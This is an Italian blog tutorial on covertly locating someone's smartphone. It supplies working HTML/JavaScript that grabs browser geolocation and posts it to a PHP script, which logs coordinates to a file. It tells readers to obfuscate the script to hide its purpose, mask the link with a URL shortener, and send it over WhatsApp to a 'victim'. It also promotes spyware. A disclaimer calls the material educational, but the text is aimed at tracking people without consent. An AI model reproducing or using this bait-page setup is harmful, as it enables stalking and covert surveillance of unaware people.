Come localizzare un cellulare senza essere scoperti

Come scoprire la posizione di una persona tramite smartphone senza installare programmi

Come localizzare un cellulare senza essere scoperti

In questo blog più volte ho scritto articoli su come spiare un cellulare, su come spiare Whatsapp e su come spiare Facebook. Ma, anche se non hai letto le mie guide ma hai letto altri articoli, di altri autori, ti sarai reso conto che per spiare una cellulare devi averlo a portata di mano, anche solo per qualche minuto, per installarci sopra un software spia. Oggi imparerai qualcosa di nuovo. Leggendo questo articolo, imparerai un piccolo trucco per localizzare un cellulare senza essere scoperti e senza dover installare alcun software.

Il trucco sfrutta la funzione di geolocalizzazione presente su tutti i moderni smartphone attivabile anche dal browser. In pratica, ciò che faremo è scrivere qualche riga di codice in javascript e php e di inviare un “link esca” alla nostra vittima.

Ovviamente, e non mi stancherò mai di ripeterlo, spiare una persona, senza il suo consenso è un reato. Le mie guide sono realizzate esclusivamente per fini didattici e per avere coscienza delle vulnerabilità dei moderni sistemi di comunicazione. Non sono assolutamente un invito a commettere reati. L’autore dell’articolo e il sito non possono essere ritenuti responsabili di un eventuale uso improprio che farai delle nozioni che imparerai.

Sicuramente sarai ansioso e non vedrai l’ora di iniziare e di mettere in pratica questo trucchetto. Bene, questa volta imparerai veramente qualcosa di nuovo, qualcosa che ti farà sentire un po’ un piccolo hacker!

Se preferisci, puoi sempre affidarti a soluzioni già pronte come un software spia. Se invece pensi di essere intraprendente, prosegui con la lettura.

Come localizzare un cellulare senza essere scoperti

Iniziamo subito a vedere di cosa hai bisogno.  Ti servirà un editor di testo per scrivere il codice e di uno spazio web, anche gratuito, che supporta PHP. Come editor di testo puoi usare anche notepad di Windows, ma ti consiglio di usarne uno con qualche funzionalità in più come Notepad++. Mentre per quanto riguarda lo spazio web gratuito, ti basterà scrivere su google “hosting php free” per avere un elenco di servizi di hosting gratuiti che supportano php.

Il supporto per la geolocalizzazione è uno standard presente nelle specifiche di HTML5. Quasi tutti i moderni browser lo supportano e in modo particolare i browser installati sui dispositivi mobile. Ma, per motivi di privacy, per poter attivare la localizzazione è necessario il consenso dell’utente. Questa limitazione non dovrebbe essere un problema. Infatti, tieni presente che quasi tutti i servizi online come Facebook, Google, Instagram e altri chiedono l’accesso alla posizione dell’utente, quindi è un consenso che si è abituati a dare.

A questo punto, iniziamo preparare il nostro script.

La prima cosa da fare è preparare una pagina HTML che contiene un immagine, una gif animata o un video che servirà da esca e che dovrà essere visualizzata dalla vittima.

Quindi incominciamo a scrivere il codice HTML della nostra pagina esca.

Apri l’editor di testo e inserisci il seguente codice HTML.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title></title>
</head>
<body>
<img src="https://cdn.pixabay.com/photo/2015/11/17/13/13/dogue-de-bordeaux-1047521_960_720.jpg" alt="immagine">
</body>
</html>

Io come esca ho usato un immagine, ma tu puoi usare un video o un immagine animata, è sufficiente inserire il codice di ciò che vuoi far visualizzare all’interno del tag <body>.

Avviare la geolocalizzazione del browser

A questo punto avviamo la geolocalizzazione tramite il seguente codice javascript:

     navigator.geolocation.getCurrentPosition(showPosition,showError);

Per verificare il funzionamento aggiungi del codice, che poi dovrai cancellare, per visualizzare la tua attuale posizione.

Quindi, modifica la pagina aggiungendo il codice javascript necessario per la localizzazione.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title></title>
</head>
<body>
<p id="demo"></p>
<script>
var x = document.getElementById("demo");

function getLocation() {
if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(showPosition,showError);
} else {
x.innerHTML = "Geolocation is not supported by this browser.";
}
}

function showPosition(position) {
var acc = Math.round(position.coords.accuracy);
var lat = position.coords.latitude;
var lon = position.coords.longitude
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "demo.php?lat=" + lat + "&lon=" + lon +"&acc="+acc, true);
xhttp.send();
x.innerHTML = "posizione: " + position.coords.latitude + "," + position.coords.longitude + " tolleranza m "+acc;
}

getLocation();
function showError(error) {
switch(error.code) {
case error.PERMISSION_DENIED:
x.innerHTML = "L'utente ha negato l'utilizzo della posizione."
break;
case error.POSITION_UNAVAILABLE:
x.innerHTML = "Il browser non riesce a calcolare la posizione " + error.message
break;
case error.TIMEOUT:
x.innerHTML = "Timeout durante il calcolo della posizione."
break;
case error.UNKNOWN_ERROR:
x.innerHTML = "Si è verificato un errore: " + error.message
break;
}
}
</script>
<img src="https://cdn.pixabay.com/photo/2015/11/17/13/13/dogue-de-bordeaux-1047521_960_720.jpg" alt="immagine"> 
</body> 
</html>

Le parti in grassetto le dovrai eliminare dopo aver testato il funzionamento.

Il codice javascript aggiunto accede alle Geolocation Api, attraverso le quali potrai avere la posizione del cellulare da localizzare.

Quando la pagina viene aperta dal browser, il codice in javascript avvia la localizzazione e dopo aver ottenuto la posizione, la visualizza sullo schermo e le invia tramite una chiamata AJAX ad un file con il nome demo.php, situato nella stessa cartella del server in cui si trova la pagina.

Salva il file della pagina appena creata con il nome index.html.

Cliccando sul file appena salvato si aprirà il browser predefinito, ti verrà chiesta l’autorizzazione ad accedere alla tua posizione e non appena viene dato il consenso, in alto verranno visualizzate le coordinate della tua attuale posizione.

localizzare un cellulare
Come localizzare un cellulare tramite browser senza essere scoperti. La posizione ha un’approssimazione piuttosto alta, perché è stato attivato l’accesso tramite browser. Ma sul cellulare la posizione sarà più precisa.

Accedendo al codice HTML della pagina dal browser si visualizza anche il codice javascript. Per evitare di mostrare chiaramente le nostre intenzioni, il codice in javascript può essere offuscato grazie ad alcuni servizi online che permettono di modificarlo e renderlo illeggibile. Per nascondere il codice javascript, rendendolo indecifrabile, puoi usare https://obfuscator.io/.

A questo punto realizziamo lo script in php che si occuperà di salvare le coordinate su un file di testo.

Codice php per salvare le coordinate ottenute

Occupiamoci ora della parte in PHP.

Per localizzare un cellulare senza essere scoperti, dovrai salvare le coordinate ottenute su un file che potrai poi leggere in un secondo momento.

Apri nuovamente il tuo editor di testo e incolla il seguente codice PHP.

<?php
$cord = "coordinate = ".$_GET['lat'] .",".$_GET['lon'] . " tolleranza : m ".$_GET['acc']."\r\n";
$fp = fopen('data.txt', 'a');
fwrite($fp, date('d/m/Y H:i:s').' >>> ');
fwrite($fp, $cord);
fclose($fp);
?>

Lo script in PHP crea un file data.txt e ci scrive le coordinate ricevute dal browser, visualizzando la data e l’ora in cui le ha ricevute.

Nel caso in cui la pagina html dovesse assere aperta più volte, la posizione sarà inviata più volte. Lo script in PHP ogni volta riaprirà il file data.txt creato e aggiungerà una nuova riga con la nuova posizione.

Salva il file con il codice in PHP con il nome demo.php.

A questo punto carica i file sul server dove hai attivato il tuo spazio web gratuito. Per farlo, molto probabilmente dovrai usare un client ftp. Se sei alle prime armi ti consiglio di leggere la documentazione del hosting.

Se vuoi fare le cose per bene, ti consiglio di non caricare i file nella directory principale, ma di creare una sottocartella dove caricarli. Una altro particolare importante, da non trascurare, è che la geolocalizzazione potrebbe non funzionare su protocollo HTTP senza il supporto SSL/TSL. In pratica l’indirizzo per accedere al file html che si occupa di localizzare il dispositivo dovrà essere del tipo: https://nomedominio/cartella/index.html.

Usa https://bitly.com/per ottenere uno short link simile a questo:  https://bit.ly/2X7OLaE, quindi più facile da inviare.

Localizzare un cellulare tramite Whatsapp

A questo punto non dovrai fare altro che inviare il link, tramite Whatsapp, alla tua vittima e attendere che il messaggio venga letto.

Ti accorgerai che avrà visualizzato il messaggio quando ti apparirà la doppia spunta blu su Whatsapp.

Dopo che la pagina esca è stata aperta, accedendo alla cartella del server dove hai salvato i file, noterai la presenza del file data.txt.

Scarica il file data.txt e visualizzane il contenuto. Vedrai salvati nel file la data e l’ora in cui è stata avviata lo localizzazione e le coordinate della posizione dello smartphone in quel momento. Copia e incolla le coordinate su Google Maps per visualizzare la posizione su mappa.

Come hai avuto modo di vedere, con qualche piccolo trucchetto e con un po’ di social engineering, è possibile ingannare una persona e spiare la sua posizione in tempo reale.

Naturalmente usando un software spia si possono ottenere maggiori informazioni e spiare tutte le attività su uno smartphone. Come per esempi usando I-Spy.

Metti mi piace alla nostra pagina Facebook e seguici per essere informato sui prossimi tutorial che pubblicheremo.

 

Articoli correlati

loading...
Avatar
Informazioni su Rocco Vincy 104 Articoli
Analista/Programmatore e blogger, si occupa di sicurezza informatica e delle comunicazioni. Co-fondatore del sito/blog "BlogAmico"